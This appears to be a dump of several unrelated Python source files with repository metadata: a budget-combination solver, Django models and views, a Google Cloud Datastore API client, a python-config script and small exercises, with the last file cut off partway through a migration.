if issubclass(TeamRoutingRule, dict):
for key, value in self.items():
result[key] = value
return result
    def to_str(self):
        """Returns the string representation of the model"""
        # pprint gives stable, readable multi-line output for nested models.
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        # Delegate to to_str() so repr/str/pprint all agree.
        return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TeamRoutingRule):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"john@oram.ca"
] | john@oram.ca |
b962777592420ddaec641e394930ccb7f4714f4b | 70b339d0b2638a7914d0d56c5edf8a2637c9f4b0 | /Microsoft-budgetCombination.py | 7c5b8974df0f7b5706643a7f2353cba23ce79435 | [] | no_license | pflun/advancedAlgorithms | 9991da7514024e18ba08de8688966b9220e12571 | 5520dbcd26999b98e1229bf03c2f62dd690a2ddc | refs/heads/master | 2023-02-19T12:05:26.902535 | 2023-02-14T06:08:54 | 2023-02-14T06:08:54 | 189,055,701 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,148 | py | # -*- coding: utf-8 -*-
# 给你一个menu,是一个map,key是菜名,value是价格,比如
# "apple": 3.25,
# "chicken": 4.55,
# "cake":10.85,
#
# 然后给你一个budget,比如7.80.
# 要你给出所有菜名的combination,总价要正好符合budget,次序不重要,但不能有重复。
# 比如,如果budget是7.80,他就要求结果是[["apple", "chicken"]],不能是[["apple", "chicken"],["chicken","apple"]]
# 比如,如果budget是6.50,他就要求结果是[["apple", "apple"]]
class Solution:
    def budgetCombination(self, menu, budget):
        """Return every multiset of menu items whose prices sum to *budget*.

        menu   -- mapping of dish name -> price (float)
        budget -- exact total to reach (float)

        Per the spec above: items may repeat (budget 6.50 with
        "apple": 3.25 yields [["apple", "apple"]]) and each distinct
        combination is reported once, with names in sorted order.
        The original code called `dfs` with the wrong arity, referenced an
        undefined `getSum`, blocked repeats via a `used` set (contradicting
        the 6.50 example) and never returned its results; this
        implementation fixes all of that.  Prices are converted to integer
        cents so float rounding cannot drop a valid combination.
        """
        names = sorted(menu)
        cents = [int(round(menu[name] * 100)) for name in names]
        target = int(round(budget * 100))
        results = []

        def backtrack(start, remaining, chosen):
            # Hitting exactly zero means `chosen` is a valid combination.
            if remaining == 0:
                results.append(list(chosen))
                return
            for i in range(start, len(names)):
                price = cents[i]
                if price <= remaining:
                    chosen.append(names[i])
                    # Recurse from `i` (not i + 1) so a dish may repeat;
                    # never going backwards avoids duplicate orderings.
                    backtrack(i, remaining - price, chosen)
                    chosen.pop()

        backtrack(0, target, [])
        return results
self.used.remove(food) | [
"zgao@gwu.edu"
] | zgao@gwu.edu |
f343e24f6f579b9ecca603705a2a764f1b6153c7 | 52c5b78f3afab4573926dd6d0a49e10ee1a77e26 | /myproject/boards/models.py | be05814d747d51aef868e0b17217166717b84237 | [] | no_license | zime-py/eight | d9eefc28a00a8411f3a58b0e931807492bc5bfc2 | 2138b2a8884dea299654ff7c41060c72f183486c | refs/heads/master | 2023-01-11T23:03:53.062441 | 2020-11-14T14:43:04 | 2020-11-14T14:43:04 | 312,831,969 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,017 | py | from django.db import models
class Do(models.Model):
    """An entity identified by a name and a roll string."""
    name = models.CharField(max_length=100)
    # Free text today; the author's note suggests it may become a user FK.
    roll = models.CharField(max_length=100) #ForeignKey('auth.user',on_delete=models.CASCADE,)
    def __str__(self):
        return self.name
class Did(models.Model):
    """A result recorded against a Do entry."""
    # Free text today; the author's note suggests it may become a user FK.
    result = models.CharField(max_length=100) #ForeignKey('auth.user',on_delete=models.CASCADE,)
    do = models.ForeignKey('Do',on_delete=models.CASCADE,)
    def __str__(self):
        return self.result
class Done(models.Model):
    """A year attached to a Did entry."""
    # Stored as text, not an IntegerField -- matches the original schema.
    year = models.CharField(max_length=100) #ForeignKey('auth.user',on_delete=models.CASCADE,)
    did = models.ForeignKey('Did',on_delete=models.CASCADE,)
    def __str__(self):
        return self.year
class Go(models.Model):
    """A position that links one Do, one Did and one Done row together."""
    position = models.CharField(max_length=100)
    do = models.ForeignKey('Do',on_delete=models.CASCADE,)
    did = models.ForeignKey('Did',on_delete=models.CASCADE,)
    done = models.ForeignKey('Done',on_delete=models.CASCADE,)
    def __str__(self):
        return self.position
| [
"mahmudhossain836@gmail.com"
] | mahmudhossain836@gmail.com |
e1b381d9aa05348e59d8373f067baaca3e76ac38 | 951d62ecd155103fa77efaa68fb7611ac4b9af4b | /testtask/views.py | 000f7b29ff9b717ae435c4111fc440ba7ef938da | [] | no_license | darkdkl/stdvor_dev | 352cb46e45d943c3b31d430bd84d684979456d7e | c4b9dc8b691f11cf15dda565214036367141765a | refs/heads/master | 2021-09-26T11:14:57.299457 | 2020-01-15T08:08:31 | 2020-01-15T08:08:31 | 234,028,893 | 0 | 0 | null | 2021-09-22T18:23:23 | 2020-01-15T07:59:51 | Python | UTF-8 | Python | false | false | 2,290 | py | from django.shortcuts import render
from django.http import JsonResponse
from testtask.models import Order, Сontact, Product
from django.views.generic import View
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator
from django.http import QueryDict
# Create your views here.
data = [{'name': 'Test', 'e-mail': 'linux@org.ru'},
{'name': 'Test2', 'e-mail': 'linux2@org.ru'}]
def index(request):
    """Debug endpoint: echoes the query string to stdout and returns
    two hard-coded sample contacts as JSON."""
    print(request.GET)  # kept: mirrors the original debug output
    sample = [{'name': 'Test', 'e-mail': 'linux@org.ru'},
              {'name': 'Test2', 'e-mail': 'linux2@org.ru'}]
    return JsonResponse(sample, safe=False)
def serialize(order):
    """Flatten an order (with its contact and products) into a JSON-ready dict.

    NOTE(review): assumes `order.products` behaves like a Django related
    manager (hence `.all()`) and that `cost` is numeric -- confirm against
    the models.  The 'byer' key spelling is preserved: it is part of the
    API contract.
    """
    contact = order.contact
    buyer = {
        'name': f'{contact.first_name} {contact.last_name}',
        'tel': f'{contact.tel_number}',
        'email': contact.email,
        'address': contact.address,
    }
    total = sum([product.cost for product in order.products.all()])
    return {
        'order_num': order.number,
        'date_create': order.date,
        'byer': [buyer],
        'amount': total,
    }
# @method_decorator(csrf_exempt,name='dispatch')
# class ApiView(View):
# http_method_names = ['get', 'post', 'put', 'delete']
# def post(self, *args, **kwargs):
# print(self.request.POST.get('test2'))
# return JsonResponse(data, safe=False)
# def put(self, *args, **kwargs):
# orders = Order.objects.all()
# data = [serialize(order) for order in orders]
# return JsonResponse(data, safe=False)
# def delete(self, *args, **kwargs):
# # print(self.request.POST.get('_method') )
# get = QueryDict(self.request.body)
# print(get.dict())
# return JsonResponse(data, safe=False)
@csrf_exempt
def get_api(request, pk=None):
    """Return all orders serialized as JSON for GET and PUT requests.

    Fixes:
    * `@csrf_exempt` was stacked twice; applying it once is sufficient.
    * The PUT branch passed the HttpRequest object itself to QueryDict,
      which expects an urlencoded string/bytes; the request body is the
      intended payload.
    Other HTTP methods fall through and return None, as before.
    """
    if request.method == "GET":
        orders = Order.objects.all()
        data = [serialize(order) for order in orders]
        return JsonResponse(data, safe=False)
    if request.method == "PUT":
        params = QueryDict(request.body)
        print(params.values())  # kept: mirrors the original debug output
        orders = Order.objects.all()
        data = [serialize(order) for order in orders]
        return JsonResponse(data, safe=False)
| [
"dark.dmake@gmail.com"
] | dark.dmake@gmail.com |
2c600cd8520114fcf732b05492d70efb49e64f23 | 58af092b07edb8d34d8d03886d6bd56d5c34af42 | /english_munchers_dj/telegram_bot/migrations/0001_initial.py | 366e348ec9e185f732a5237448ed2d8c76a0051d | [] | no_license | Vido/freela-em | ced9f79cecc247bd1a42aae744a32155f07d9124 | 78d9ea732d6d869af5bdf78666e41078d7777e0b | refs/heads/master | 2022-12-08T19:27:21.186061 | 2019-03-04T21:54:29 | 2019-03-04T21:54:29 | 110,721,168 | 0 | 6 | null | 2022-12-07T23:49:35 | 2017-11-14T17:15:46 | JavaScript | UTF-8 | Python | false | false | 620 | py | # Generated by Django 2.0 on 2017-12-11 14:40
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial schema: creates the UpdateResponse table."""
    # First migration of the app: nothing to depend on.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='UpdateResponse',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('class_request_id', models.IntegerField()),
                # Raw update payload; JSONField here requires PostgreSQL.
                ('update_dict', django.contrib.postgres.fields.jsonb.JSONField()),
            ],
        ),
    ]
| [
"vido@usp.br"
] | vido@usp.br |
c910db3bd9b777a4af8a0435d71e2fe3a8998987 | be02fd6adb789e8b5f5c8f77b2635b71b1b24a52 | /prob.py | 7e69c9913f33a9eba9130d35476f74ca184f195b | [] | no_license | pavlin-policar/rosalind | 05cd66bec512e7b3ca414effd00e4d1b4ffd563a | d9c8b2ab20e950ef543964fc5e1c47bbf21b8362 | refs/heads/master | 2021-11-25T08:20:28.083661 | 2021-11-07T17:28:50 | 2021-11-07T17:30:50 | 71,159,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | import operator
from functools import reduce
from math import log10
if __name__ == '__main__':
    # Rosalind PROB: for each GC-content value, print the log10 probability
    # that a random string with that GC content matches the given DNA string.
    dna = input()
    gc_contents = map(float, input().split())

    def base_probability(base, gc):
        # C and G each occur with probability gc/2; A and T with (1 - gc)/2.
        return gc / 2 if base in ('C', 'G') else (1 - gc) / 2

    results = []
    for gc in gc_contents:
        likelihood = reduce(operator.mul,
                            [base_probability(b, gc) for b in dna], 1)
        results.append(log10(likelihood))
    print(*results)
| [
"pavlin.g.p@gmail.com"
] | pavlin.g.p@gmail.com |
d98628b7b3a81ff0fe9d3ae51d115f5d3ded0262 | 6444622ad4a150993955a0c8fe260bae1af7f8ce | /djangoenv/bin/python-config | f60d09bc69d85bc162d02850a5fd49608851224d | [] | no_license | jeremyrich/Lesson_RestAPI_jeremy | ca965ef017c53f919c0bf97a4a23841818e246f9 | a44263e45b1cc1ba812059f6984c0f5be25cd234 | refs/heads/master | 2020-04-25T23:13:47.237188 | 2019-03-22T09:26:58 | 2019-03-22T09:26:58 | 173,138,073 | 0 | 0 | null | 2019-03-22T09:26:59 | 2019-02-28T15:34:19 | Python | UTF-8 | Python | false | false | 2,403 | #!/home/mymy/Desktop/Python_agility/cours/Hugo/Lessons_RestAPI/Lesson_RestAPI/djangoenv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
    """Print a usage summary to stderr and terminate with *code*."""
    options = '|'.join('--' + opt for opt in valid_opts)
    sys.stderr.write("Usage: {0} [{1}]\n".format(sys.argv[0], options))
    sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
# Emit one line of build configuration per requested flag, in the order
# the flags were given on the command line.
for opt in opt_flags:
    if opt == '--prefix':
        print(sysconfig.get_config_var('prefix'))
    elif opt == '--exec-prefix':
        print(sysconfig.get_config_var('exec_prefix'))
    elif opt in ('--includes', '--cflags'):
        # Both spellings print the include dirs; --cflags appends CFLAGS.
        flags = ['-I' + sysconfig.get_path('include'),
                 '-I' + sysconfig.get_path('platinclude')]
        if opt == '--cflags':
            flags.extend(getvar('CFLAGS').split())
        print(' '.join(flags))
    elif opt in ('--libs', '--ldflags'):
        libs = ['-lpython' + pyver + abiflags]
        libs += getvar('LIBS').split()
        libs += getvar('SYSLIBS').split()
        # add the prefix/lib/pythonX.Y/config dir, but only if there is no
        # shared library in prefix/lib/.
        if opt == '--ldflags':
            if not getvar('Py_ENABLE_SHARED'):
                libs.insert(0, '-L' + getvar('LIBPL'))
            if not getvar('PYTHONFRAMEWORK'):
                libs.extend(getvar('LINKFORSHARED').split())
        print(' '.join(libs))
    elif opt == '--extension-suffix':
        # EXT_SUFFIX is the modern name; 'SO' is the pre-3.5 fallback.
        ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
        if ext_suffix is None:
            ext_suffix = sysconfig.get_config_var('SO')
        print(ext_suffix)
    elif opt == '--abiflags':
        if not getattr(sys, 'abiflags', None):
            exit_with_usage()
        print(sys.abiflags)
    elif opt == '--configdir':
        print(sysconfig.get_config_var('LIBPL'))
| [
"jeremyrich@free.fr"
] | jeremyrich@free.fr | |
afa20d25cc412db5e1c7a07e46b39a65987b99c2 | d488f052805a87b5c4b124ca93494bc9b78620f7 | /google-cloud-sdk/.install/.backup/lib/googlecloudsdk/third_party/apis/datastore/v1/datastore_v1_client.py | 3390ffe8e1fab09390fda0ae8e4cba82b5321e06 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] | permissive | PacktPublishing/DevOps-Fundamentals | 5ce1fc938db66b420691aa8106ecfb3f9ceb1ace | 60597e831e08325c7e51e8557591917f7c417275 | refs/heads/master | 2023-02-02T04:48:15.346907 | 2023-01-30T08:33:35 | 2023-01-30T08:33:35 | 131,293,311 | 13 | 19 | null | null | null | null | UTF-8 | Python | false | false | 17,492 | py | """Generated client library for datastore version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.datastore.v1 import datastore_v1_messages as messages
class DatastoreV1(base_api.BaseApiClient):
"""Generated client library for service datastore version v1."""
MESSAGES_MODULE = messages
BASE_URL = u'https://datastore.googleapis.com/'
_PACKAGE = u'datastore'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform', u'https://www.googleapis.com/auth/datastore']
_VERSION = u'v1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_CLIENT_CLASS_NAME = u'DatastoreV1'
_URL_VERSION = u'v1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new datastore handle."""
url = url or self.BASE_URL
super(DatastoreV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.projects_operations = self.ProjectsOperationsService(self)
self.projects = self.ProjectsService(self)
class ProjectsOperationsService(base_api.BaseApiService):
"""Service class for the projects_operations resource."""
_NAME = u'projects_operations'
def __init__(self, client):
super(DatastoreV1.ProjectsOperationsService, self).__init__(client)
self._upload_configs = {
}
def Cancel(self, request, global_params=None):
"""Starts asynchronous cancellation on a long-running operation. The server.
makes a best effort to cancel the operation, but success is not
guaranteed. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`. Clients can use
Operations.GetOperation or
other methods to check whether the cancellation succeeded or whether the
operation completed despite cancellation. On successful cancellation,
the operation is not deleted; instead, it becomes an operation with
an Operation.error value with a google.rpc.Status.code of 1,
corresponding to `Code.CANCELLED`.
Args:
request: (DatastoreProjectsOperationsCancelRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Cancel')
return self._RunMethod(
config, request, global_params=global_params)
Cancel.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1/projects/{projectsId}/operations/{operationsId}:cancel',
http_method=u'POST',
method_id=u'datastore.projects.operations.cancel',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1/{+name}:cancel',
request_field='',
request_type_name=u'DatastoreProjectsOperationsCancelRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes a long-running operation. This method indicates that the client is.
no longer interested in the operation result. It does not cancel the
operation. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request: (DatastoreProjectsOperationsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1/projects/{projectsId}/operations/{operationsId}',
http_method=u'DELETE',
method_id=u'datastore.projects.operations.delete',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1/{+name}',
request_field='',
request_type_name=u'DatastoreProjectsOperationsDeleteRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Gets the latest state of a long-running operation. Clients can use this.
method to poll the operation result at intervals as recommended by the API
service.
Args:
request: (DatastoreProjectsOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1/projects/{projectsId}/operations/{operationsId}',
http_method=u'GET',
method_id=u'datastore.projects.operations.get',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1/{+name}',
request_field='',
request_type_name=u'DatastoreProjectsOperationsGetRequest',
response_type_name=u'GoogleLongrunningOperation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Lists operations that match the specified filter in the request. If the.
server doesn't support this method, it returns `UNIMPLEMENTED`.
NOTE: the `name` binding allows API services to override the binding
to use different resource name schemes, such as `users/*/operations`. To
override the binding, API services can add a binding such as
`"/v1/{name=users/*}/operations"` to their service configuration.
For backwards compatibility, the default name includes the operations
collection id, however overriding users must ensure the name binding
is the parent resource, without the operations collection id.
Args:
request: (DatastoreProjectsOperationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningListOperationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1/projects/{projectsId}/operations',
http_method=u'GET',
method_id=u'datastore.projects.operations.list',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'filter', u'pageSize', u'pageToken'],
relative_path=u'v1/{+name}/operations',
request_field='',
request_type_name=u'DatastoreProjectsOperationsListRequest',
response_type_name=u'GoogleLongrunningListOperationsResponse',
supports_download=False,
)
  class ProjectsService(base_api.BaseApiService):
    """Service class for the projects resource.

    apitools-generated binding for the Cloud Datastore v1 ``projects``
    resource.  Each public method issues exactly one RPC through
    ``self._RunMethod``; the wire-level description of the call is attached
    afterwards as a lazily evaluated ``method_config`` lambda so the
    ApiMethodInfo is only constructed when the base class asks for it.
    """
    # Resource name used by the apitools base class for method registration.
    _NAME = u'projects'
    def __init__(self, client):
      super(DatastoreV1.ProjectsService, self).__init__(client)
      # No media-upload methods exist on this service, so no upload configs.
      self._upload_configs = {
          }
    def AllocateIds(self, request, global_params=None):
      """Allocates IDs for the given keys, which is useful for referencing an entity.
before it is inserted.

      Args:
        request: (DatastoreProjectsAllocateIdsRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (AllocateIdsResponse) The response message.
      """
      config = self.GetMethodConfig('AllocateIds')
      return self._RunMethod(
          config, request, global_params=global_params)
    # Wire-format description consumed by base_api when running the method.
    # The same lambda pattern is repeated for every method below.
    AllocateIds.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'datastore.projects.allocateIds',
        ordered_params=[u'projectId'],
        path_params=[u'projectId'],
        query_params=[],
        relative_path=u'v1/projects/{projectId}:allocateIds',
        request_field=u'allocateIdsRequest',
        request_type_name=u'DatastoreProjectsAllocateIdsRequest',
        response_type_name=u'AllocateIdsResponse',
        supports_download=False,
    )
    def BeginTransaction(self, request, global_params=None):
      """Begins a new transaction.

      Args:
        request: (DatastoreProjectsBeginTransactionRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (BeginTransactionResponse) The response message.
      """
      config = self.GetMethodConfig('BeginTransaction')
      return self._RunMethod(
          config, request, global_params=global_params)
    BeginTransaction.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'datastore.projects.beginTransaction',
        ordered_params=[u'projectId'],
        path_params=[u'projectId'],
        query_params=[],
        relative_path=u'v1/projects/{projectId}:beginTransaction',
        request_field=u'beginTransactionRequest',
        request_type_name=u'DatastoreProjectsBeginTransactionRequest',
        response_type_name=u'BeginTransactionResponse',
        supports_download=False,
    )
    def Commit(self, request, global_params=None):
      """Commits a transaction, optionally creating, deleting or modifying some.
entities.

      Args:
        request: (DatastoreProjectsCommitRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (CommitResponse) The response message.
      """
      config = self.GetMethodConfig('Commit')
      return self._RunMethod(
          config, request, global_params=global_params)
    Commit.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'datastore.projects.commit',
        ordered_params=[u'projectId'],
        path_params=[u'projectId'],
        query_params=[],
        relative_path=u'v1/projects/{projectId}:commit',
        request_field=u'commitRequest',
        request_type_name=u'DatastoreProjectsCommitRequest',
        response_type_name=u'CommitResponse',
        supports_download=False,
    )
    def Export(self, request, global_params=None):
      """Exports a copy of all or a subset of entities from Google Cloud Datastore.
to another storage system, such as Google Cloud Storage. Recent updates to
entities may not be reflected in the export. The export occurs in the
background and its progress can be monitored and managed via the
Operation resource that is created. The output of an export may only be
used once the associated operation is done. If an export operation is
cancelled before completion it may leave partial data behind in Google
Cloud Storage.

      Args:
        request: (DatastoreProjectsExportRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (GoogleLongrunningOperation) The response message.
      """
      config = self.GetMethodConfig('Export')
      return self._RunMethod(
          config, request, global_params=global_params)
    Export.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'datastore.projects.export',
        ordered_params=[u'projectId'],
        path_params=[u'projectId'],
        query_params=[],
        relative_path=u'v1/projects/{projectId}:export',
        request_field=u'googleDatastoreAdminV1ExportEntitiesRequest',
        request_type_name=u'DatastoreProjectsExportRequest',
        response_type_name=u'GoogleLongrunningOperation',
        supports_download=False,
    )
    def Import(self, request, global_params=None):
      """Imports entities into Google Cloud Datastore. Existing entities with the.
same key are overwritten. The import occurs in the background and its
progress can be monitored and managed via the Operation resource that is
created. If an ImportEntities operation is cancelled, it is possible
that a subset of the data has already been imported to Cloud Datastore.

      Args:
        request: (DatastoreProjectsImportRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (GoogleLongrunningOperation) The response message.
      """
      config = self.GetMethodConfig('Import')
      return self._RunMethod(
          config, request, global_params=global_params)
    Import.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'datastore.projects.import',
        ordered_params=[u'projectId'],
        path_params=[u'projectId'],
        query_params=[],
        relative_path=u'v1/projects/{projectId}:import',
        request_field=u'googleDatastoreAdminV1ImportEntitiesRequest',
        request_type_name=u'DatastoreProjectsImportRequest',
        response_type_name=u'GoogleLongrunningOperation',
        supports_download=False,
    )
    def Lookup(self, request, global_params=None):
      """Looks up entities by key.

      Args:
        request: (DatastoreProjectsLookupRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (LookupResponse) The response message.
      """
      config = self.GetMethodConfig('Lookup')
      return self._RunMethod(
          config, request, global_params=global_params)
    Lookup.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'datastore.projects.lookup',
        ordered_params=[u'projectId'],
        path_params=[u'projectId'],
        query_params=[],
        relative_path=u'v1/projects/{projectId}:lookup',
        request_field=u'lookupRequest',
        request_type_name=u'DatastoreProjectsLookupRequest',
        response_type_name=u'LookupResponse',
        supports_download=False,
    )
    def ReserveIds(self, request, global_params=None):
      """Prevents the supplied keys' IDs from being auto-allocated by Cloud.
Datastore.

      Args:
        request: (DatastoreProjectsReserveIdsRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (ReserveIdsResponse) The response message.
      """
      config = self.GetMethodConfig('ReserveIds')
      return self._RunMethod(
          config, request, global_params=global_params)
    ReserveIds.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'datastore.projects.reserveIds',
        ordered_params=[u'projectId'],
        path_params=[u'projectId'],
        query_params=[],
        relative_path=u'v1/projects/{projectId}:reserveIds',
        request_field=u'reserveIdsRequest',
        request_type_name=u'DatastoreProjectsReserveIdsRequest',
        response_type_name=u'ReserveIdsResponse',
        supports_download=False,
    )
    def Rollback(self, request, global_params=None):
      """Rolls back a transaction.

      Args:
        request: (DatastoreProjectsRollbackRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (RollbackResponse) The response message.
      """
      config = self.GetMethodConfig('Rollback')
      return self._RunMethod(
          config, request, global_params=global_params)
    Rollback.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'datastore.projects.rollback',
        ordered_params=[u'projectId'],
        path_params=[u'projectId'],
        query_params=[],
        relative_path=u'v1/projects/{projectId}:rollback',
        request_field=u'rollbackRequest',
        request_type_name=u'DatastoreProjectsRollbackRequest',
        response_type_name=u'RollbackResponse',
        supports_download=False,
    )
    def RunQuery(self, request, global_params=None):
      """Queries for entities.

      Args:
        request: (DatastoreProjectsRunQueryRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (RunQueryResponse) The response message.
      """
      config = self.GetMethodConfig('RunQuery')
      return self._RunMethod(
          config, request, global_params=global_params)
    RunQuery.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'datastore.projects.runQuery',
        ordered_params=[u'projectId'],
        path_params=[u'projectId'],
        query_params=[],
        relative_path=u'v1/projects/{projectId}:runQuery',
        request_field=u'runQueryRequest',
        request_type_name=u'DatastoreProjectsRunQueryRequest',
        response_type_name=u'RunQueryResponse',
        supports_download=False,
    )
| [
"saneetk@packtpub.com"
] | saneetk@packtpub.com |
dfcb9af51620932e87402ca302ac7f129e5addfb | 7257d16c3352283a5e0237db74870374531d8e2d | /ch12/ex04.py | a19b3f8d607b9b5924c2782eb3e0a5d35a7c2f83 | [] | no_license | EunhyeKIMM/python | 886703a3ace8c51e4cf00d23ae5d6bfd99cd7e92 | b4de600d9fccdd8f5fbef2a387d63f99610b67ed | refs/heads/master | 2023-02-19T05:12:54.500019 | 2021-01-20T15:49:01 | 2021-01-20T15:49:01 | 329,340,972 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 109 | py | import sys
# Minimal command REPL: echo every line the user types until they enter
# 'quit', then terminate the process with a success status.
while True:
    ans = input('명령>')  # prompt text means "command" in Korean
    if ans == 'quit':
        sys.exit(0)  # exit code 0: normal termination
    print(ans)
"kimeunhye0710@gmail.com"
] | kimeunhye0710@gmail.com |
cae0e6ea55aba796f6f8be2d75ee40d5756d5a32 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /sLb2Fs6aGRQBYAXqQ_11.py | 87b06555ae8f879dd67c342359ad561108009eb4 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | """
Given a Rubik's Cube with a side length of `n`, return the number of
individual stickers that are needed to cover the whole cube.

* The Rubik's cube of side length `1` has **6 stickers**.
* The Rubik's cube of side length `2` has **24 stickers**.
* The Rubik's cube of side length `3` has **54 stickers**.
### Examples
how_many_stickers(1) ➞ 6
how_many_stickers(2) ➞ 24
how_many_stickers(3) ➞ 54
### Notes
* Keep in mind there are six faces to keep track of.
* Expect only positive whole numbers.
"""
def how_many_stickers(n):
    """Return the number of stickers on an n x n x n Rubik's cube.

    Each of the cube's six faces is an n-by-n grid of stickers, so the
    total is simply 6 * n^2.
    """
    return 6 * n * n
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
cdbc0a4ed1d136f416ba29f80d6ac70a7f07cf3b | 5b71e2952f34dd3bb20148874d952fee06d31857 | /app/mf/crud/migrations/0068_auto_20210130_1317.py | dd034f797a90346ddce19c87f0439ee92d564331 | [] | no_license | isela1998/facebook | a937917cddb9ef043dd6014efc44d59d034102b1 | a0f2f146eb602b45c951995a5cb44409426250c5 | refs/heads/master | 2023-07-18T02:14:50.293774 | 2021-08-28T03:26:06 | 2021-08-28T03:26:06 | 400,613,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | # Generated by Django 3.1.1 on 2021-01-30 17:47
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django schema migration for the `crud` app: drops the
    # single Sale.type_exchange column and replaces it with two independent
    # exchange-rate columns (exchange1/exchange2), both defaulting to 0.0.

    # Must be applied after migration 0067 of the same app.
    dependencies = [
        ('crud', '0067_auto_20210130_1104'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='sale',
            name='type_exchange',
        ),
        migrations.AddField(
            model_name='sale',
            name='exchange1',
